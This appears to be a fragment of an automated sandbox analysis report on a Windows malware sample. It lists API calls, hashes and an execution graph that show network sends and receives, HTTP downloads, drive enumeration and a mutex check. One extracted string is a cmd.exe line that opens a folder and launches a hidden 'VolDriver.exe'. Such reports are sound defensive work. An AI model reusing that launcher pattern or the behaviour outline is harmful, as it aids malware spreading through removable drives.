                                                                          • String ID: $h@$%windir%\System32\cmd.exe$/c start .\%s & start .\%s\VolDriver.exe
                                                                          • API String ID: 2038452267-1952734972
                                                                          • Opcode ID: aa8a32cb6d162733ff770eaad9f94bc5271c9336f419dc8e96cac525845bdcf3
                                                                          • Instruction ID: ff343e69aad13d9306a4779b19c6e3e8efaa2fda419abce3ce5a22e1d679f985
                                                                          • Opcode Fuzzy Hash: aa8a32cb6d162733ff770eaad9f94bc5271c9336f419dc8e96cac525845bdcf3
                                                                          • Instruction Fuzzy Hash: 0631D975A40208EFCB04DF98D885EDEB7B5EF88704F108199E519A73A5CB74AE81CB54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E53C
                                                                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E58B
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E59F
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E5B7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeStringlstrcmpi
                                                                          • String ID: device$deviceType
                                                                          • API String ID: 1602765415-3511266565
                                                                          • Opcode ID: 5397dffdce9bfa1d28fd9043f65dc7fff47123e69829d8d1bf88c428b6381307
                                                                          • Instruction ID: 4edf041377c7e14b34ff85b7b029659f12f4b503add3d656b401b028ce93b30a
                                                                          • Opcode Fuzzy Hash: 5397dffdce9bfa1d28fd9043f65dc7fff47123e69829d8d1bf88c428b6381307
                                                                          • Instruction Fuzzy Hash: AB31DC70A0010AEFDB14CFD5DC84BAFB7B5AF48304F108969E515A7390E778EA45CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E3DC
                                                                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E42B
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E43F
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040E457
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeStringlstrcmpi
                                                                          • String ID: service$serviceType
                                                                          • API String ID: 1602765415-3667235276
                                                                          • Opcode ID: f7a49091048d5f2f7edd1107e0f91d764ba8354fbf103c94dbc5479e42702eb7
                                                                          • Instruction ID: ed37c26d591e2f51ed35895ea84be071d11e51b9472e036d4bc20704c2c7b13d
                                                                          • Opcode Fuzzy Hash: f7a49091048d5f2f7edd1107e0f91d764ba8354fbf103c94dbc5479e42702eb7
                                                                          • Instruction Fuzzy Hash: 0E31EAB1A0020ADFCB04DF99D884FAFB7B5BF48304F108569E515B73A0D778AA85CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _allshl_aullshr
                                                                          • String ID:
                                                                          • API String ID: 673498613-0
                                                                          • Opcode ID: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                                                          • Instruction ID: a69f75a9761dffb427665dfb7b283027f7726bbdceffba7061474d3de6b788b4
                                                                          • Opcode Fuzzy Hash: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                                                          • Instruction Fuzzy Hash: 0B111F326005186B8B10EF5EC44268ABBD6EF84361B15C136FC2CDF35AD675D9414BD4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                            • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                            • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                            • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                          • String ID:
                                                                          • API String ID: 3966618661-0
                                                                          • Opcode ID: 5b1d9706ac0f4861890903663e3aab6c9f99d0d6f1a575e52deddebed6e66e4c
                                                                          • Instruction ID: 99e37592b547e3d1ed5d588db8744cb94e6869326ec40c3cf91f75bef10dfbd8
                                                                          • Opcode Fuzzy Hash: 5b1d9706ac0f4861890903663e3aab6c9f99d0d6f1a575e52deddebed6e66e4c
                                                                          • Instruction Fuzzy Hash: CA41A175604B02ABC718DB39D848797F3A4BF84314F14827EE82D933D1E739A855CB99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _allshl
                                                                          • String ID:
                                                                          • API String ID: 435966717-0
                                                                          • Opcode ID: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                                                          • Instruction ID: bcae3434c2129d449cda67bd59c491ccebf17daabcdef2e049336039ec6bac91
                                                                          • Opcode Fuzzy Hash: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                                                          • Instruction Fuzzy Hash: 3EF03172901428AB9750EEFF85424CBF7E69F98365F218176F81CE3261E9709D0546F2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401346
                                                                          • WaitForSingleObject.KERNEL32(Function_00001100,000000FF,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401352
                                                                          • CloseHandle.KERNEL32(Function_00001100,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 0040135C
                                                                            • Part of subcall function 0040A3F0: HeapFree.KERNEL32(021A0000,00000000,00402612,?,00402612,?), ref: 0040A44B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                          • String ID: pdu
                                                                          • API String ID: 309973729-2320407122
                                                                          • Opcode ID: e0f329f12d2259528821c27011c0918a976d96f57bacaacdd1962e62a77ab920
                                                                          • Instruction ID: d174ec339e303b727d6f690e0c81bd26c44cc0430c196550e953614590448db6
                                                                          • Opcode Fuzzy Hash: e0f329f12d2259528821c27011c0918a976d96f57bacaacdd1962e62a77ab920
                                                                          • Instruction Fuzzy Hash: 0C01D6765003009BCB249F55ECC0D9B7769AF49311704467AFC05AB396C638E8508775
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                          • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                          • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                          • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                          • String ID:
                                                                          • API String ID: 2074799992-0
                                                                          • Opcode ID: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                                                          • Instruction ID: 85cdc4ac02e7a7d961e62fa06f42dc9c3305788cd6d7a2bd32de2e1c20a60a18
                                                                          • Opcode Fuzzy Hash: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                                                          • Instruction Fuzzy Hash: DD212F715083159BC200DF55D884D5BB7E8BFCCB54F044A2EF59493291D734EA49CBAA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                          • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                                                          • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                                                          • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Recv$ErrorLastSleep
                                                                          • String ID:
                                                                          • API String ID: 3668019968-0
                                                                          • Opcode ID: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                                                          • Instruction ID: df3cbe2ca7d05c2b70b960210cdf5b20c1916dde76b22b2cec88194eea221140
                                                                          • Opcode Fuzzy Hash: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                                                          • Instruction Fuzzy Hash: 6A11AD72148305AFD310CF65EC84AEBB7ECEB88710F40492AF945D2140E679E94997B6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                          • WSAGetLastError.WS2_32 ref: 00401B12
                                                                          • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                          • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Send$ErrorLastSleep
                                                                          • String ID:
                                                                          • API String ID: 2121970615-0
                                                                          • Opcode ID: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                                                          • Instruction ID: 6027246a5f20d5291fae036152240cd5c1f9414458335baedc5b4335fd2ad738
                                                                          • Opcode Fuzzy Hash: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                                                          • Instruction Fuzzy Hash: 8F014F712483046EE7209B96DC88F9B77A8EBC4711F508429F608961C0D7B5A9459B79
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(021A0634), ref: 0040D669
                                                                          • CloseHandle.KERNEL32(021A0638), ref: 0040D698
                                                                          • LeaveCriticalSection.KERNEL32(021A0634), ref: 0040D6A7
                                                                          • DeleteCriticalSection.KERNEL32(021A0634), ref: 0040D6B4
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                          • String ID:
                                                                          • API String ID: 3102160386-0
                                                                          • Opcode ID: 7bf4f18b4702a230417702d69d1d85fee5c3e33d7782737d8a2bd2494ce2794f
                                                                          • Instruction ID: fd906f08b3b88ca1f2a1246d33854d1cb2ade3c35c50db1fce3d72ba6cb97bf7
                                                                          • Opcode Fuzzy Hash: 7bf4f18b4702a230417702d69d1d85fee5c3e33d7782737d8a2bd2494ce2794f
                                                                          • Instruction Fuzzy Hash: 64115EB4D00208EBDB08DF94D984A9DB775FF44309F1085A9E80AA7341D739EE94DB85
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                          • String ID:
                                                                          • API String ID: 2223660684-0
                                                                          • Opcode ID: 998351d4031ac32c6d6d10c259f6772ab7bb4c14647e9de6e02c89c2d1c81f5d
                                                                          • Instruction ID: a0dc8c3c5f9b8335a8c68536f832427d4bfc411db9c79380583e721672fa548d
                                                                          • Opcode Fuzzy Hash: 998351d4031ac32c6d6d10c259f6772ab7bb4c14647e9de6e02c89c2d1c81f5d
                                                                          • Instruction Fuzzy Hash: 4F01F7792423009FC7209F26ED84A9B73E8AF45711F00043EE44693650DB39E401CB28
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0040DE00: memset.NTDLL ref: 0040DE28
                                                                            • Part of subcall function 0040DE00: InternetCrackUrlA.WININET(0040D8D9,00000000,10000000,0000003C), ref: 0040DE78
                                                                            • Part of subcall function 0040DE00: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DE88
                                                                            • Part of subcall function 0040DE00: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DEC1
                                                                            • Part of subcall function 0040DE00: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DEF7
                                                                            • Part of subcall function 0040DE00: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DF1F
                                                                            • Part of subcall function 0040DE00: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DF68
                                                                            • Part of subcall function 0040DE00: InternetCloseHandle.WININET(00000000), ref: 0040DFF7
                                                                            • Part of subcall function 0040DCF0: SysAllocString.OLEAUT32(00000000), ref: 0040DD1E
                                                                            • Part of subcall function 0040DCF0: CoCreateInstance.OLE32(00412738,00000000,00004401,00412728,00000000), ref: 0040DD46
                                                                            • Part of subcall function 0040DCF0: SysFreeString.OLEAUT32(00000000), ref: 0040DDE1
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040DC9B
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040DCA5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                          • String ID: %S%S
                                                                          • API String ID: 1017111014-3267608656
                                                                          • Opcode ID: e90815c1511221caa1bb4232c4d734c08bee98e5bb0896a31ce96f10b80c8380
                                                                          • Instruction ID: 028390a8fa3b683b7bf8b6e952c0b4b0066608931571745b54bc663e5df7610f
                                                                          • Opcode Fuzzy Hash: e90815c1511221caa1bb4232c4d734c08bee98e5bb0896a31ce96f10b80c8380
                                                                          • Instruction Fuzzy Hash: 4C415BB5E002099FDB04DBE4C885AEFB7B5BF48304F104529E605B7390D778AA45CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • StrChrA.SHLWAPI(00000000,0000007C), ref: 00407306
                                                                          • Sleep.KERNEL32(000003E8), ref: 00407337
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: P~0
                                                                          • API String ID: 3472027048-138063361
                                                                          • Opcode ID: 754d6f7678a9d22ca5b9d6cd3d671f9ed3892c2cd29b210122976304f2a72595
                                                                          • Instruction ID: 42fb3ef0a0ea9ce1f0c1cd41f2aa7e292651273a77fcc00f5b674e7b102c0273
                                                                          • Opcode Fuzzy Hash: 754d6f7678a9d22ca5b9d6cd3d671f9ed3892c2cd29b210122976304f2a72595
                                                                          • Instruction Fuzzy Hash: 62118F74E04208FBDB04CFA4D885BAE7B75AF41305F10C0AAED056B381D679BA90DB46
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(00416C40,?,00000000,?), ref: 00405E5F
                                                                          • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405E9E
                                                                          • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F13
                                                                          • LeaveCriticalSection.KERNEL32(00416C40), ref: 00405F30
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSectionmemcpy$EnterLeave
                                                                          • String ID:
                                                                          • API String ID: 469056452-0
                                                                          • Opcode ID: 11253c93557e272cfa09b9ef5557470c866ee47475f0489080f61b160b652d5f
                                                                          • Instruction ID: d4c7a0d735d14698d69a5203b24d712139acd761569c954f121491256ddf65dc
                                                                          • Opcode Fuzzy Hash: 11253c93557e272cfa09b9ef5557470c866ee47475f0489080f61b160b652d5f
                                                                          • Instruction Fuzzy Hash: B8216B70A04208ABCB05DB94D885BDFB772EB44304F1481BAE84667281D67DAA85CF9A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Execution Graph

                                                                          Execution Coverage:0.1%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:1447
                                                                          Total number of Limit Nodes:1
                                                                          execution_graph 5350 40d140 5356 4021b0 5350->5356 5353 40d17f 5354 40d165 WaitForSingleObject 5360 401600 5354->5360 5357 4021bb 5356->5357 5358 4021cf 5356->5358 5357->5358 5381 402020 5357->5381 5358->5353 5358->5354 5361 401737 5360->5361 5362 40160d 5360->5362 5361->5353 5362->5361 5363 401619 EnterCriticalSection 5362->5363 5364 401630 5363->5364 5365 4016b5 LeaveCriticalSection SetEvent 5363->5365 5364->5365 5369 401641 InterlockedDecrement 5364->5369 5372 40165a InterlockedExchangeAdd 5364->5372 5379 4016a0 InterlockedDecrement 5364->5379 5366 4016d0 5365->5366 5367 4016e8 5365->5367 5370 4016d6 PostQueuedCompletionStatus 5366->5370 5368 40d510 11 API calls 5367->5368 5371 4016f3 5368->5371 5369->5364 5370->5367 5370->5370 5373 40d650 7 API calls 5371->5373 5372->5364 5374 40166d InterlockedIncrement 5372->5374 5375 4016fc CloseHandle CloseHandle WSACloseEvent 5373->5375 5402 401c50 WSARecv 5374->5402 5408 40ad80 shutdown closesocket 5375->5408 5378 401724 DeleteCriticalSection 5380 40a3f0 _invalid_parameter 3 API calls 5378->5380 5379->5364 5380->5361 5382 409fd0 7 API calls 5381->5382 5383 40202b 5382->5383 5384 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5383->5384 5390 4021a5 5383->5390 5385 402076 CreateIoCompletionPort 5384->5385 5386 40219f 5384->5386 5385->5386 5387 40208f 5385->5387 5388 401600 36 API calls 5386->5388 5389 40d370 8 API calls 5387->5389 5388->5390 5391 402094 5389->5391 5390->5358 5391->5386 5392 40209f WSASocketA 5391->5392 5392->5386 5393 4020bd setsockopt htons bind 5392->5393 5393->5386 5394 402126 listen 5393->5394 5394->5386 5395 40213a WSACreateEvent 5394->5395 5395->5386 5396 402147 WSAEventSelect 5395->5396 5396->5386 5400 402159 5396->5400 5397 40217f 5399 40d3a0 17 API calls 5397->5399 5398 40d3a0 17 API calls 5398->5400 5401 402194 5399->5401 5400->5397 5400->5398 5401->5358 5403 401cd2 5402->5403 5404 401c8e 5402->5404 5403->5364 5405 401c90 WSAGetLastError 5404->5405 5406 401ca4 Sleep WSARecv 5404->5406 5407 401cdb 5404->5407 5405->5403 5405->5404 5406->5403 5406->5405 5407->5364 5408->5378 5409 4074c1 ExitThread 5728 406b86 5729 406b68 5728->5729 5730 406ca8 Sleep 5729->5730 5731 406b99 5729->5731 5733 406cb8 ExitThread 5729->5733 5736 406340 4 API calls 5729->5736 5730->5729 5732 406260 4 API calls 5731->5732 5735 406baa 5732->5735 5734 406bd0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5738 406c46 wsprintfW 5734->5738 5739 406c5b wsprintfW 5734->5739 5735->5734 5737 406bcb 5735->5737 5736->5729 5738->5739 5740 406650 49 API calls 5739->5740 5740->5737 5741 407d89 5742 407d92 5741->5742 5743 407da1 34 API calls 5742->5743 5744 408bd6 5742->5744 5436 40a4ce 5437 40a3f0 _invalid_parameter 3 API calls 5436->5437 5438 40a48d 5437->5438 5439 40a4a2 5438->5439 5440 40a1e0 _invalid_parameter 7 API calls 5438->5440 5441 40a4a4 memcpy 5438->5441 5440->5438 5441->5438 4353 4074d0 Sleep CreateMutexA GetLastError 4354 407506 ExitProcess 4353->4354 4355 40750e 6 API calls 4353->4355 4356 4075b3 